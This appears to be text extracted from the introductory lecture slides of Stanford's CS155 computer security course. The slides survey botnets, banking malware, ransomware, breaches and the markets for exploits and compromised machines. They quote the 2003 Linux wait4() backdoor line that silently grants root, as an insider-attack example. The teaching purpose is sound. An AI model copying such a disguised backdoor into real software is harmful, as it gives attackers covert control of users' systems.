https://cs155.Stanford.edu CS155 Computer Security Course overview Dan Boneh The computer security problem Lots of buggy software Social engineering is very effective Money can be made from finding and exploiting vulns.
1. Marketplace for vulnerabilities 2. Marketplace for owned machines (PPI) 3. Many methods to profit from owned machines current state of computer security Dan Boneh source: https://www.cvedetails.com/top-50-products.php?year=2018 Dan Boneh Vulnerable applications being exploited
Office Android Java Browser Source: Kaspersky Security Bulletin 2017 Dan Boneh Introduction
Sample attacks Dan Boneh Why own client machines: 1. IP address and bandwidth stealing Attackers goal: look like a random Internet user Use the IP address of infected machine or phone for: Spam (e.g. the storm botnet) Spamalytics: 1:12M pharma spams leads to purchase 1:260K greeting card spams leads to infection
Denial of Service: Services: 1 hour (20$), 24 hours (100$) Click fraud (e.g. Clickbot.a) Dan Boneh Why own machines: 2. Steal user credentials, crypto miners keylog for banking passwords, web passwords, gaming pwds. Example: SilentBanker
(and many like it) User requests login page Malware injects Javascript When user submits information, also sent to attacker Man-in-the-Browser (MITB)
Bank sends login page needed to log in Bank Similar mechanism used by Zeus botnet Dan Boneh Lots of financial malware records banking passwords
via keylogger spread via spam email and hacked web sites maintains access to PC for future installs Source: Kaspersky Security Bulletin 2017 Dan Boneh Users attacked: stats
300,000 users/month worldwide Source: Kaspersky Security Bulletin 2015 A worldwide problem Dan Boneh Why own machines: 3. Ransomware a worldwide problem Worm spreads via a vuln. in SMB (port 445)
Apr. 14, 2017: Eternalblue vuln. released by ShadowBrokers May 12, 2017: Worm detected (3 weeks to weaponize) Dan Boneh
Dan Boneh WannaCry ransomware Ransomware in 2017: # users attacked Source: Kaspersky Security Bulletin 2017 Dan Boneh Why own machines: 4. Spread to isolated systems
Example: Stuxtnet Windows infection Siemens PCS 7 SCADA control software on Windows Siemens device controller on isolated network More on this later in course Dan Boneh Server-side attacks Data theft: credit card numbers, intellectual property Example: Equifax (July 2017), 143M customer data impacted Exploited known vulnerability in Apache Struts (RCE)
Many similar (smaller) attacks since 2000 Political motivation: DNC, Tunisia Facebook (Feb. 2011), GitHub (Mar. 2015) Infect visiting users Dan Boneh
Infecting visiting users: Mpack PHP-based tools installed on compromised web sites Embedded as an iframe on infected page Infects browsers that visit site Features management console provides stats on infection rates Sold for several 100$ Customer care can be purchased, one-year support contract Impact: 500,000 infected sites
(compromised via SQL injection) Several defenses: e.g. Google safe browsing Dan Boneh Types of data stolen Source: California breach notification report, 2015 (2012-2015)
Dan Boneh How companies lose data insider misuse/attack 7.00% malware/hacking insider error 17.00% 54.00%
22.00% lost/stolen laptops How do we have this data? Source: California breach notification report, 2016 Dan Boneh Insider attacks: example Hidden trap door in Linux (nov 2003) Allows attacker to take over a computer Practically undetectable change (uncovered via CVS logs)
Inserted line in wait4() if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; Looks like a standard error check, but See: http://lwn.net/Articles/57135/ Dan Boneh Many more examples Access to SIPRnet and a CD-RW: 260,000 cables Wikileaks
SysAdmin for city of SF government. Changed passwords, locking out city from router access Inside logic bomb took down 2000 UBS servers Can security technology help? Dan Boneh Introduction The Marketplace for Vulnerabilities Dan Boneh
Marketplace for Vulnerabilities Option 1: bug bounty programs (many) Google Vulnerability Reward Program: up to $31,337 Microsoft Bounty Program: up to $100K Apple Bug Bounty program: up to $200K (secure boot firmware) Pwn2Own competition: $15K Option 2: Zerodium: up to $2M for iOS, many others $500K for Android
(2019) Dan Boneh Example: Mozilla Dan Boneh Marketplace for Vulnerabilities RCE: remote code execution LPE: local privilege escalation
SBX: sandbox escape Source: Zerodium payouts Dan Boneh Marketplace for Vulnerabilities RCE: remote code execution LPE: local privilege escalation SBX: sandbox escape RJB: remote jailbreak
Source: Zerodium payouts Dan Boneh Marketplace for owned machines clients Pay-per-install (PPI) services PPI operation: 1. Own victims machine 2. Download and install clients code 3. Charge client
spam bot keylogger PPI service Victims Source: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf) Dan Boneh
Marketplace for owned machines clients Cost: US spam bot keylogger - 100-180$ / 1000 machines PPI service
Asia - 7-8$ / 1000 machines Victims Source: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf) Dan Boneh This course Goals: Be aware of exploit techniques Learn to defend and avoid common exploits
Learn to architect secure systems Dan Boneh This course Part 1: basics (architecting for security) Securing apps, OS, and legacy code Isolation, authentication, and access control Part 2: Web security (defending against a web attacker) Building robust web sites, understand the browser security model Part 3: network security (defending against a network attacker) Monitoring and architecting secure networks.
Part 4: securing mobile applications Dan Boneh Dont try this at home ! Dan Boneh Ken Thompsons clever Trojan Dan Boneh
